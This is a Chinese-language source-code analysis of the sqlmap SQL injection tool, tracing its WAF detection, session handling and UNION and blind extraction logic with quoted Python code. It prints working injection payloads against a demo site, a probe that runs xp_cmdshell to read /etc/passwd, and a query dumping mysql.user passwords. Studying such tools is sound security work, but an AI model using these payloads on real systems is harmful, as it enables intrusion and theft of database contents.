if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
errMsg += "found in provided GET, POST, Cookie or header values"
raise SqlmapGenericException(errMsg)
else:
for place in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
for parameter in conf.paramDict.get(place, {}):
if any(parameter.lower().count(_) for _ in CSRF_TOKEN_PARAMETER_INFIXES):
message = "%s parameter '%s' appears to hold anti-CSRF token. " % (place, parameter)
message += "Do you want sqlmap to automatically update it in further requests? [y/N] "
test = readInput(message, default="N")
if test and test[0] in ("y", "Y"):
conf.csrfToken = parameter
break
设置储存的数据库
sqlmap默认使用的是sqlite
def _setHashDB():
"""
Check and set the HashDB SQLite file for query resume functionality.
"""
if not conf.hashDBFile:
conf.hashDBFile = conf.sessionFile or os.path.join(conf.outputPath, "session.sqlite")
if os.path.exists(conf.hashDBFile):
if conf.flushSession:
try:
os.remove(conf.hashDBFile)
logger.info("flushing session file")
except OSError, msg:
errMsg = "unable to flush the session file (%s)" % msg
raise SqlmapFilePathException(errMsg)
conf.hashDB = HashDB(conf.hashDBFile)
储存基本信息到数据库
def _resumeHashDBValues():
"""
Resume stored data values from HashDB
"""
kb.absFilePaths = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True) or kb.absFilePaths
kb.brute.tables = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_TABLES, True) or kb.brute.tables
kb.brute.columns = hashDBRetrieve(HASHDB_KEYS.KB_BRUTE_COLUMNS, True) or kb.brute.columns
kb.chars = hashDBRetrieve(HASHDB_KEYS.KB_CHARS, True) or kb.chars
kb.dynamicMarkings = hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, True) or kb.dynamicMarkings
kb.xpCmdshellAvailable = hashDBRetrieve(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE) or kb.xpCmdshellAvailable
kb.errorChunkLength = hashDBRetrieve(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH)
if kb.errorChunkLength and kb.errorChunkLength.isdigit():
kb.errorChunkLength = int(kb.errorChunkLength)
else:
kb.errorChunkLength = None
conf.tmpPath = conf.tmpPath or hashDBRetrieve(HASHDB_KEYS.CONF_TMP_PATH)
for injection in hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True) or []:
if isinstance(injection, InjectionDict) and injection.place in conf.paramDict and \
injection.parameter in conf.paramDict[injection.place]:
if not conf.tech or intersect(conf.tech, injection.data.keys()):
if intersect(conf.tech, injection.data.keys()):
injection.data = dict(filter(lambda (key, item): key in conf.tech, injection.data.items()))
if injection not in kb.injections:
kb.injections.append(injection)
_resumeDBMS()
_resumeOS()
储存数据库信息到数据库
def _resumeDBMS():
"""
Resume stored DBMS information from HashDB
"""
value = hashDBRetrieve(HASHDB_KEYS.DBMS)
if not value:
return
dbms = value.lower()
dbmsVersion = [UNKNOWN_DBMS_VERSION]
_ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS]))
_ = re.search(r"\A%s (.*)" % _, dbms, re.I)
if _:
dbms = _.group(1).lower()
dbmsVersion = [_.group(2)]
if conf.dbms:
check = True
for aliases, _, _, _ in DBMS_DICT.values():
if conf.dbms.lower() in aliases and dbms not in aliases:
check = False
break
if not check:
message = "you provided '%s' as a back-end DBMS, " % conf.dbms
message += "but from a past scan information on the target URL "
message += "sqlmap assumes the back-end DBMS is '%s'. " % dbms
message += "Do you really want to force the back-end "
message += "DBMS value? [y/N] "
test = readInput(message, default="N")
if not test or test[0] in ("n", "N"):
conf.dbms = None
Backend.setDbms(dbms)
Backend.setVersionList(dbmsVersion)
else:
infoMsg = "resuming back-end DBMS '%s' " % dbms
logger.info(infoMsg)
Backend.setDbms(dbms)
Backend.setVersionList(dbmsVersion)
储存操作系统信息到数据库
def _resumeOS():
"""
Resume stored OS information from HashDB
"""
value = hashDBRetrieve(HASHDB_KEYS.OS)
if not value:
return
os = value
if os and os != 'None':
infoMsg = "resuming back-end DBMS operating system '%s' " % os
logger.info(infoMsg)
if conf.os and conf.os.lower() != os.lower():
message = "you provided '%s' as back-end DBMS operating " % conf.os
message += "system, but from a past scan information on the "
message += "target URL sqlmap assumes the back-end DBMS "
message += "operating system is %s. " % os
message += "Do you really want to force the back-end DBMS "
message += "OS value? [y/N] "
test = readInput(message, default="N")
if not test or test[0] in ("n", "N"):
conf.os = os
else:
conf.os = os
Backend.setOs(conf.os)
添加身份验证
如果有的话,添加身份验证。
def _setAuthCred():
"""
Adds authentication credentials (if any) for current target to the password manager
(used by connection handler)
"""
if kb.passwordMgr and all(_ is not None for _ in (conf.scheme, conf.hostname, conf.port, conf.authUsername, conf.authPassword)):
kb.passwordMgr.add_password(None, "%s://%s:%d" % (conf.scheme, conf.hostname, conf.port), conf.authUsername, conf.authPassword)
直连数据库方式开始注入
开始注入,注入过程和普通相同,所以稍后在研究。
sss
处理目标参数
在开始之前,处理
if conf.url and not any((conf.forms, conf.crawlDepth)):
kb.targets.add((conf.url, conf.method, conf.data, conf.cookie, None))
config文件
if conf.configFile and not kb.targets:
errMsg = "you did not edit the configuration file properly, set "
errMsg += "the target URL, list of targets or google dork"
logger.error(errMsg)
return False
多目标处理
if kb.targets and len(kb.targets) > 1:
infoMsg = "sqlmap got a total of %d targets" % len(kb.targets)
logger.info(infoMsg)
循环解包开始注入
for targetUrl, targetMethod, targetData, targetCookie, targetHeaders in kb.targets:
try:
conf.url = targetUrl
conf.method = targetMethod.upper() if targetMethod else targetMethod
conf.data = targetData
conf.cookie = targetCookie
conf.httpHeaders = list(initialHeaders)
conf.httpHeaders.extend(targetHeaders or [])
处理参数
这里分GET和POST两种处理方式,
if PLACE.GET in conf.parameters and not any([conf.data, conf.testParameter]):
for parameter in re.findall(r"([^=]+)=([^%s]+%s?|\Z)" % (re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER, re.escape(conf.paramDel or "") or DEFAULT_GET_POST_DELIMITER), conf.parameters[PLACE.GET]):
paramKey = (conf.hostname, conf.path, PLACE.GET, parameter[0])
print paramKey
if paramKey not in kb.testedParams:
testSqlInj = True
break
else:
paramKey = (conf.hostname, conf.path, None, None)
if paramKey not in kb.testedParams:
testSqlInj = True
比如传入
python .\sqlmap.py -u http://demo.lorexxar.pw/get.php?user=user1
就获得
(u'demo.lorexxar.pw', u'/get.php', 'GET', u'user')
check waf
然后开始检查waf
check waf
这里的check逻辑算法来自Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
通过随机数加payload构造最终payload
payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
这里IDS_WAF_CHECK_PAYLOAD就是上面来源上的payload
AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert("XSS")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#
拼接请求
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
添加延迟
pushValue(conf.timeout)
conf.timeout = IDS_WAF_CHECK_TIMEOUT
发起请求
try:
retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
except SqlmapConnectionException:
retVal = True
finally:
kb.matchRatio = None
conf.timeout = popValue()
识别waf
预先加载函数
if not kb.wafFunctions:
setWafFunctions()
这里包含的waf检测规则非常复杂,sqlmap在这方面还是做的比较好
循环检测
for function, product in kb.wafFunctions:
try:
logger.debug("checking for WAF/IDS/IPS product '%s'" % product)
found = function(_)
except Exception, ex:
errMsg = "exception occurred while running "
errMsg += "WAF script for '%s' ('%s')" % (product, getSafeExString(ex))
logger.critical(errMsg)
found = False
if found:
retVal = product
break
相应的显示
if retVal:
errMsg = "WAF/IDS/IPS identified as '%s'. Please " % retVal
errMsg += "consider usage of tamper scripts (option '--tamper')"
logger.critical(errMsg)
message = "are you sure that you want to "
message += "continue with further target testing? [y/N] "
output = readInput(message, default="N")
if output and output[0] not in ("Y", "y"):
raise SqlmapUserQuitException
else:
warnMsg = "WAF/IDS/IPS product hasn't been identified"
logger.warn(warnMsg)
测试空连接
测试空连接的思路来自Reference: http://www.wisec.it/sectou.php?id=472f952d79293
try:
pushValue(kb.pageCompress)
kb.pageCompress = False
page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
kb.nullConnection = NULLCONNECTION.HEAD
infoMsg = "NULL connection is supported with HEAD header"
logger.info(infoMsg)
else:
page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
kb.nullConnection = NULLCONNECTION.RANGE
infoMsg = "NULL connection is supported with GET header "
infoMsg += "'%s'" % kb.nullConnection
logger.info(infoMsg)
else:
_, headers, _ = Request.getPage(skipRead = True)
if HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
kb.nullConnection = NULLCONNECTION.SKIP_READ
infoMsg = "NULL connection is supported with 'skip-read' method"
logger.info(infoMsg)
except SqlmapConnectionException, ex:
errMsg = getSafeExString(ex)
raise SqlmapConnectionException(errMsg)
finally:
kb.pageCompress = popValue()
开始注入逻辑
从这里开始,终于开始真正的注入逻辑了。
sqlmap 源码分析(四)开始注入
开始注入
储存结果到文件
在注入之前,我们先把注入payload储存到文件。(当然是在开启的情况下)
def _saveToResultsFile():
if not conf.resultsFP:
return
results = {}
techniques = dict(map(lambda x: (x[1], x[0]), getPublicTypeMembers(PAYLOAD.TECHNIQUE)))
for injection in kb.injections + kb.falsePositives:
if injection.place is None or injection.parameter is None:
continue
key = (injection.place, injection.parameter, ';'.join(injection.notes))
if key not in results:
results[key] = []
results[key].extend(injection.data.keys())
for key, value in results.items():
place, parameter, notes = key
line = "%s,%s,%s,%s,%s%s" % (safeCSValue(kb.originalUrls.get(conf.url) or conf.url), place, parameter, "".join(map(lambda x: techniques[x][0].upper(), sorted(value))), notes, os.linesep)
conf.resultsFP.writelines(line)
if not results:
line = "%s,,,,%s" % (conf.url, os.linesep)
conf.resultsFP.writelines(line)
这里的kb.injections
就是我们的测试语句
[{'dbms': 'MySQL', 'suffix': " AND '[RANDSTR]'='[RANDSTR]", 'clause': [1, 9], 'notes': [], 'ptype': 2, 'dbms_version': ['>= 5.5'], 'prefix': "'", 'place': 'POST', 'data': {1: {'comment': '', 'matchRatio': 0.744, 'title': 'AND boolean-based blind - WHERE or HAVING clause', 'templatePayload': None, 'vector': 'AND [INFERENCE]', 'where': 1, 'payload': u"user=user1' AND 9674=9674 AND 'ilwI'='ilwI"}, 2: {'comment': '', 'matchRatio': 0.744, 'title': 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)', 'templatePayload': None, 'vector': "AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))", 'where': 1, 'payload': u"user=user1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7171717671,(SELECT (ELT(9141=9141,1))),0x716a787871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'Lpdv'='Lpdv"}, 5: {'comment': '', 'matchRatio': 0.744, 'title': 'MySQL >= 5.0.12 AND time-based blind', 'templatePayload': None, 'vector': 'AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])', 'where': 1, 'payload': u"user=user1' AND SLEEP([SLEEPTIME]) AND 'YMTj'='YMTj"}, 6: {'comment': '[GENERIC_SQL_COMMENT]', 'matchRatio': 0.744, 'title': 'Generic UNION query (NULL) - 1 to 20 columns', 'templatePayload': None, 'vector': (1, 2, '[GENERIC_SQL_COMMENT]', "'", " AND '[RANDSTR]'='[RANDSTR]", 'NULL', 1, False, False), 'where': 1, 'payload': u"user=user1' UNION ALL SELECT NULL,CONCAT(0x7171717671,0x455455665759535741516e444c6878675142594d565477695058624c7670534f71706b5954574f5a,0x716a787871)-- oVjT"}}, 'conf': {'code': None, 'string': u'user1', 'notString': None, 'titles': None, 'regexp': None, 'textOnly': None, 'optimize': None}, 'parameter': u'user', 'os': None}]
储存到数据库
同样的,如果开启了储存到数据库选项,会预先把payload储存到数据库
def _saveToHashDB():
injections = hashDBRetrieve(HASHDB_KEYS.KB_INJECTIONS, True)
if not isListLike(injections):
injections = []
injections.extend(_ for _ in kb.injections if _ and _.place is not None and _.parameter is not None)
_ = dict()
for injection in injections:
key = (injection.place, injection.parameter, injection.ptype)
if key not in _:
_[key] = injection
else:
_[key].data.update(injection.data)
hashDBWrite(HASHDB_KEYS.KB_INJECTIONS, _.values(), True)
_ = hashDBRetrieve(HASHDB_KEYS.KB_ABS_FILE_PATHS, True)
hashDBWrite(HASHDB_KEYS.KB_ABS_FILE_PATHS, kb.absFilePaths | (_ if isinstance(_, set) else set()), True)
if not hashDBRetrieve(HASHDB_KEYS.KB_CHARS):
hashDBWrite(HASHDB_KEYS.KB_CHARS, kb.chars, True)
if not hashDBRetrieve(HASHDB_KEYS.KB_DYNAMIC_MARKINGS):
hashDBWrite(HASHDB_KEYS.KB_DYNAMIC_MARKINGS, kb.dynamicMarkings, True)
展示注入payload
除了向文件输出以外,还要把payload输出到命令行
先做目标数量的判断
if kb.testQueryCount > 0:
header = "sqlmap identified the following injection point(s) with "
header += "a total of %d HTTP(s) requests" % kb.testQueryCount
else:
header = "sqlmap resumed the following injection point(s) from stored session"
然后展示语句
if hasattr(conf, "api"):
conf.dumper.string("", kb.injections, content_type=CONTENT_TYPE.TECHNIQUES)
else:
data = "".join(set(map(lambda x: _formatInjection(x), kb.injections))).rstrip("\n")
conf.dumper.string(header, data)
这里对应命令行是这样的
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: user (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: user=user1' AND 4676=4676 AND 'ZzOn'='ZzOn
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: user=user1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b786b71,(SELECT (ELT(7994=7994,1))),0x717a787871,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'XSuv'='XSuv
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: user=user1' AND SLEEP(5) AND 'EJXX'='EJXX
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: user=user1' UNION ALL SELECT CONCAT(0x716b786b71,0x6a6a6668724d514d5448686874774f486d634550735659727866554e65554e4e4f55504146706471,0x717a787871),NULL-- QvWZ
根据位置进行注入
_selectInjection()
循环解包出目标
for injection in kb.injections:
place = injection.place
parameter = injection.parameter
ptype = injection.ptype
point = (place, parameter, ptype)
if point not in points:
points[point] = injection
else:
for key in points[point].keys():
if key != 'data':
points[point][key] = points[point][key] or injection[key]
points[point]['data'].update(injection['data'])
这里举个例子
python sqlmap.py -u http://demo.lorexxar.pw/post.php?id=2 --data user=user1 --dbs
其中place为POST
parameter为user
ptype为2
(应该是注入列数)
而injection就是相应的注入语句
对于多目标和单目标有不同的逻辑
if len(points) == 1:
kb.injection = kb.injections[0]
elif len(points) > 1:
message = "there were multiple injection points, please select "
message += "the one to use for following injections:\n"
points = []
for i in xrange(0, len(kb.injections)):
place = kb.injections[i].place
parameter = kb.injections[i].parameter
ptype = kb.injections[i].ptype
point = (place, parameter, ptype)
if point not in points:
points.append(point)
ptype = PAYLOAD.PARAMETER[ptype] if isinstance(ptype, int) else ptype
message += "[%d] place: %s, parameter: " % (i, place)
message += "%s, type: %s" % (parameter, ptype)
if i == 0:
message += " (default)"
message += "\n"
message += "[q] Quit"
select = readInput(message, default="0")
if select.isdigit() and int(select) < len(kb.injections) and int(select) >= 0:
index = int(select)
elif select[0] in ("Q", "q"):
raise SqlmapUserQuitException
else:
errMsg = "invalid choice"
raise SqlmapValueException(errMsg)
kb.injection = kb.injections[index]
进入注入
确认目标后,进入注入,这里action()
就是注入逻辑
if kb.injection.place is not None and kb.injection.parameter is not None:
if conf.multipleTargets:
message = "do you want to exploit this SQL injection? [Y/n] "
exploit = readInput(message, default="Y")
condition = not exploit or exploit[0] in ("y", "Y")
else:
condition = True
if condition:
action()
注入逻辑
获取数据库版本以及php版本
conf.dumper.singleString(conf.dbmsHandler.getFingerprint())
追溯源码到了getFingerprint()函数
def getFingerprint(self):
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp and not hasattr(conf, "api"):
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp and not hasattr(conf, "api"):
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
actVer = Format.getDbms()
_ = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
if _:
actVer += " (%s fork)" % _
if not conf.extensiveFp:
value += actVer
return value
comVer = self._commentCheck()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if comVer:
comVer = Format.getDbms([comVer])
value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
if kb.bannerFp:
banVer = kb.bannerFp["dbmsVersion"] if "dbmsVersion" in kb.bannerFp else None
if banVer and re.search("-log$", kb.data.banner):
banVer += ", logging enabled"
banVer = Format.getDbms([banVer] if banVer else None)
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
return value
返回os
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp and not hasattr(conf, "api"):
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp and not hasattr(conf, "api"):
value += "%s\n" % dbmsOsFp
返回数据库版本
value += "back-end DBMS: "
actVer = Format.getDbms()
_ = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
if _:
actVer += " (%s fork)" % _
if not conf.extensiveFp:
value += actVer
return value
跟着Format.getDbms()
def getDbms(versions=None):
"""
Format the back-end DBMS fingerprint value and return its
values formatted as a human readable string.
@return: detected back-end DBMS based upon fingerprint techniques.
@rtype: C{str}
"""
if versions is None and Backend.getVersionList():
versions = Backend.getVersionList()
return Backend.getDbms() if versions is None else "%s %s" % (Backend.getDbms(), " and ".join(filter(None, versions)))
然后追到Backend.getDbms()
def getDbms():
return aliasToDbmsEnum(kb.get("dbms"))
这里只是改了个名
注入当前用户名
然后根据选项开始注入逻辑,首先是当前用户
if conf.getCurrentUser:
conf.dumper.currentUser(conf.dbmsHandler.getCurrentUser())
拼接查询目标
query = queries[Backend.getIdentifiedDbms()].current_user.query
这里的query返回了
CURRENT_USER()
然后开始注入逻辑
if not kb.data.currentUser:
kb.data.currentUser = unArrayizeValue(inject.getValue(query))
追到inject里的
def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
传入目标expression为CURRENT_USER()
获取注入有关数据
if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
kb.technique = PAYLOAD.TECHNIQUE.UNION
kb.forcePartialUnion = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector[8]
fallback = not expected and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL and not kb.forcePartialUnion
其中kb.injection.data[PAYLOAD.TECHNIQUE.UNION]是
{'comment': '[GENERIC_SQL_COMMENT]', 'matchRatio': 0.744, 'title': 'Generic UNION query (NULL) - 1 to 20 columns', 'templatePayload': None, 'vector': (1, 2, '[GENERIC_SQL_COMMENT]', "'", " AND '[RANDSTR]'='[RANDSTR]", 'NULL', 1, False, False), 'where': 1, 'payload': u"user=user1' UNION ALL SELECT NULL,CONCAT(0x71626a7071,0x516c4d6874435a474655795351577850577a466c6b6f59494a534d574d6273524a45415776514f5a,0x7171787a71)-- HIuA"}
发起注入请求
try:
value = _goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
except SqlmapConnectionException:
if not fallback:
raise
这里的value已经获取到了返回hctfsqli1@localhost
追溯函数,传入的的参数:
query = CURRENT_USER()
unpack = True
dump = False
_goUnion()为
def _goUnion(expression, unpack=True, dump=False):
"""
Retrieve the output of a SQL query taking advantage of an union SQL
injection vulnerability on the affected parameter.
"""
output = unionUse(expression, unpack=unpack, dump=dump)
if isinstance(output, basestring):
output = parseUnionPage(output)
return output
追溯到unionUse()
首先是初始化
initTechnique(PAYLOAD.TECHNIQUE.UNION)
abortedFlag = False
count = None
origExpr = expression
startLimit = 0
stopLimit = None
value = None
width = getConsoleWidth()
start = time.time()
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(origExpr)
由于注入当前用户名可能不需要太复杂的处理,所以直接跳过中间的大段处理
if not value and not abortedFlag:
output = _oneShotUnionUse(expression, unpack)
value = parseUnionPage(output
output为qbjpqhctfsqli1@localhostqqxzq
传入expression为CURRENT_USER()
进入_oneShotUnionUse(),首先是从session读取数据
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert or False, expression), checkConf=True) # as UNION data is stored raw unconverted
如果没有,则继续,拼接payload是最重要的
if not kb.rowXmlMode:
injExpression = unescaper.escape(agent.concatQuery(expression, unpack))
kb.unionDuplicates = vector[7]
kb.forcePartialUnion = vector[8]
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else vector[6]
else:
where = vector[6]
query = agent.forgeUnionQuery(expression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, False)
payload = agent.payload(newValue=query, where=where)
这里的payload为
user=__PAYLOAD_DELIMITER__user1' UNION ALL SELECT NULL,CONCAT(0x7176626271,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x717a766271)-- SnOp__PAYLOAD_DELIMITER__
传入newValue为
' UNION ALL SELECT CONCAT(0x7170626b71,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x716a7a7a71),NULL[GENERIC_SQL_COMMENT]
让我们先来看看newValue是怎么拼接出来的,agent.concatQuery
是用来拼接处CONCAT语句的
拼接
if unpack:
concatenatedQuery = ""
query = query.replace(", ", ',')
fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, _, fieldsToCastStr, fieldsExists = self.getFields(query)
castedFields = self.nullCastConcatFields(fieldsToCastStr)
concatenatedQuery = query.replace(fieldsToCastStr, castedFields, 1)
else:
return query
这里concatenatedQuery
IFNULL(CAST(CURRENT_USER() AS CHAR),' ')
针对不同数据库的改变
if Backend.isDbms(DBMS.MYSQL):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += ",'%s')" % kb.chars.stop
elif fieldsSelectCase:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += ",'%s')" % kb.chars.stop
elif fieldsSelectFrom:
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
concatenatedQuery = "%s,'%s')%s" % (concatenatedQuery[:_].replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1), kb.chars.stop, concatenatedQuery[_:])
elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += ",'%s')" % kb.chars.stop
elif fieldsNoSelect:
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
返回
CONCAT('qqbjq',IFNULL(CAST(CURRENT_USER() AS CHAR),' '),'qqpvq')
然后forgeUnionQuery来拼接
query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
这个函数的作用是
MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user
MySQL output: UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488
和上面的逻辑大同小异,就不贴代码了
拼接好payload就要请求了
page, headers = Request.queryPage(payload, content=True, raise404=False)
这里的返回时
<table><tr><th>id</th><th>name</th></tr><tr><td>1</td><td>user1</td></tr><tr><td></td><td>qzxjqhctfsqli1@localhostqbbqq</td></tr></table> Server: nginx
Date: Fri, 19 Aug 2016 05:46:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.0.0
Content-Encoding: gzip
URI: http://demo.lorexxar.pw:80/post.php?id=2
解包出结果
if not kb.rowXmlMode:
# Parse the returned page to get the exact UNION-based
# SQL injection output
def _(regex):
return reduce(lambda x, y: x if x is not None else y, (\
extractRegexResult(regex, removeReflectiveValues(page, payload), re.DOTALL | re.IGNORECASE), \
extractRegexResult(regex, removeReflectiveValues(listToStrValue(headers.headers \
if headers else None), payload, True), re.DOTALL | re.IGNORECASE)), \
None)
# Automatically patching last char trimming cases
if kb.chars.stop not in (page or "") and kb.chars.stop[:-1] in (page or ""):
warnMsg = "automatically patching output having last char trimmed"
singleTimeWarnMessage(warnMsg)
page = page.replace(kb.chars.stop[:-1], kb.chars.stop)
retVal = _("(?P<result>%s.*%s)" % (kb.chars.start, kb.chars.stop))
这里获取到的retVal就是返回值,而传入的(?P%s.*%s)则是填补padding
(?P<result>qjpvq.*qpbjq)
然后返回到最初,输出current user: 'hctfsqli1@localhost'
注数据库名字
由于注入有很多选项,这里就只以数据库名字作为例子
if conf.getDbs:
conf.dumper.dbs(conf.dbmsHandler.getDbs())
首先是判断information.schema能不能被注
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
warnMsg = "information_schema not available, "
warnMsg += "back-end DBMS is MySQL < 5. database "
warnMsg += "names will be fetched from 'mysql' database"
logger.warn(warnMsg)
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL):
warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms()
warnMsg += "for enumeration as the counterpart to database "
warnMsg += "names on other DBMSes"
logger.warn(warnMsg)
infoMsg = "fetching database (schema) names"
else:
infoMsg = "fetching database names"
发起注入,由于阅读源码更重要在于分析代码逻辑,所以这次使用bool型盲注来注入数据,
if not kb.data.cachedDbs and isInferenceAvailable() and not conf.direct:
infoMsg = "fetching number of databases"
logger.info(infoMsg)
if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.count2
else:
query = rootQuery.blind.count
count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count):
errMsg = "unable to retrieve the number of databases"
logger.error(errMsg)
else:
plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2)
indexRange = getLimitRange(count, plusOne=plusOne)
for index in indexRange:
if Backend.isDbms(DBMS.SYBASE):
query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ")
elif Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema:
query = rootQuery.blind.query2 % index
else:
query = rootQuery.blind.query % index
db = unArrayizeValue(inject.getValue(query, union=False, error=False))
if db:
kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db))
这里首先是注入数据数量,query为基础payload
SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA
进入注入逻辑
if blind and isTechniqueAvailable(PAYLOAD.TECHNIQUE.BOOLEAN) and not found:
kb.technique = PAYLOAD.TECHNIQUE.BOOLEAN
if expected == EXPECTED.BOOL:
value = _goBooleanProxy(booleanExpression)
else:
value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
count += 1
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
核心请求为
value = _goInferenceProxy(query, fromUser, batch, unpack, charsetType, firstChar, lastChar, dump)
而对应的参数是
SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA False False True 2 None None False
二分法实现注入逻辑
elif Backend.getIdentifiedDbms() in FROM_DUMMY_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper():
expression += FROM_DUMMY_TABLE[Backend.getIdentifiedDbms()]
